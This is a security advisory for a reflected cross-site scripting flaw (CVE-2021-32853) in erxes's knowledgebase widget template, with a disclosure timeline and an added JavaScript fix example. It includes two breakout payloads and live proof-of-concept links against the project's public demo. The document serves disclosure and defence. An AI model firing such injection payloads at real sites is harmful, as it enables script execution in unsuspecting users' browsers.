Coordinated Disclosure Timeline
- 2021-08-31: Report sent to the maintainer.
- 2021-09-03: No response. Sent again.
- 2021-12-06: Asked for update.
- 2021-12-07: Added info@erxes.io to recipients.
- 2021-12-07: Public issue asking for contacts created.
- 2022-01-19: An invitation to a private repo with the report was sent to all members of Erxes org.
- 2022-01-19: All members of Erxes org are tagged in the public issue with an explanation of what the invitation is about.
- 2022-01-19: One of the members accepts the invitation.
- 2022-02-01: No response. Publishing according to our coordinated disclosure policy.
Summary
Cross-site scripting in https://github.com/erxes/erxes.
Product
https://github.com/erxes/erxes
Tested Version
The latest version to date.
Details
This template tag in widgets.ejs is vulnerable to code injection. The <%- %> tag is EJS's unescaped output tag, so the value is inserted into the script verbatim:

    window.knowledgebaseSettings = {
      topic_id: "<%- kbTopicId %>"
    }
The value comes from a request parameter here:
    res.render('widget', {
      type: 'knowledgebase',
      env: getEnv(),
      kbTopicId: req.query.topicId
    });
The inserted value is not escaped, so one can break out of the string literal or the enclosing script tag:
widgets/knowledgebase?topicId=%22-alert(1)-%22
widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
At the time of writing, this can be verified on the live demo by following these links (they are harmless):
- (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%22-alert(1)-%22
- (xss link) https://demo.erxes.io/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
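The following is an added example, not code from the erxes project or from the advisory, showing what a fix for the interpolation above needs to do. A value placed inside a JS string literal in a <script> block needs two things at once: JavaScript-string encoding (so a quote cannot end the literal) and protection against the sequence </script appearing in the output (so the HTML parser cannot end the script element). Neither HTML-escaping nor raw output provides both. The template stand-in, the encoder name toScriptSafeLiteral and the check countScriptCloseTags are assumptions made for this example; the two payloads are the URL-decoded values from the links above.

```javascript
// Added example (not erxes code): hardening the widgets.ejs interpolation.
// The vulnerable template uses EJS's unescaped tag, <%- kbTopicId %>, inside a
// JS string literal within a <script> element.

// Encode an arbitrary value as a JS string literal that is safe inside a
// <script> block. JSON.stringify handles quotes and backslashes; the extra
// replacements ensure "</script" and HTML comment openers can never appear
// literally in the output. U+2028/U+2029 are escaped because older JS
// engines treat them as line terminators. The result is still valid JSON,
// so it round-trips through JSON.parse.
function toScriptSafeLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Minimal stand-in for the EJS template on the page, so the example runs
// without the ejs package. This mimics <%- %>: the value is inserted verbatim
// between quote characters supplied by the template.
function renderWidgetUnsafe(topicId) {
  return [
    '<script>',
    'window.knowledgebaseSettings = {',
    `  topic_id: "${topicId}"`,
    '}',
    '</script>',
  ].join('\n');
}

// Hardened version: the encoder produces the whole literal, quotes included,
// so the template no longer contributes quote characters of its own.
function renderWidgetSafe(topicId) {
  return [
    '<script>',
    'window.knowledgebaseSettings = {',
    `  topic_id: ${toScriptSafeLiteral(topicId)}`,
    '}',
    '</script>',
  ].join('\n');
}

// Defender-side check usable in a unit test or review: the rendered page must
// contain exactly one script close tag, the template's own.
function countScriptCloseTags(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// The two payloads from the report, URL-decoded (constructed for the example).
const PAYLOAD_QUOTE_BREAK = '"-alert(1)-"';
const PAYLOAD_TAG_BREAK = '</script><script>alert(1)</script>';

// Compare both renderings against both payloads and report what a test would
// assert on: how many close tags leak, and whether the value survives intact.
function demo() {
  const cases = { quote: PAYLOAD_QUOTE_BREAK, tag: PAYLOAD_TAG_BREAK };
  const results = {};
  for (const [name, payload] of Object.entries(cases)) {
    results[name] = {
      unsafeCloseTags: countScriptCloseTags(renderWidgetUnsafe(payload)),
      safeCloseTags: countScriptCloseTags(renderWidgetSafe(payload)),
      roundTrips: JSON.parse(toScriptSafeLiteral(payload)) === payload,
    };
  }
  return results;
}

console.log(JSON.stringify(demo(), null, 2));
```

Running it shows the tag-breakout payload producing three script close tags in the unsafe rendering and one in the hardened one, while both payloads decode back to their original value from the encoded literal. Validating topicId against an expected identifier format at the request handler would be a reasonable additional layer, but output encoding is the control that actually closes the bug.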
CVE
- CVE-2021-32853
Impact
Code execution (on the client side). The victim must follow a malicious link or be redirected from a malicious web site.
Credit
This issue was discovered by @asgerf (Asger F) from the GitHub CodeQL team.
Contact
You can contact the GHSL team at securitylab@github.com; please include GHSL-2021-103 in any communication regarding this issue.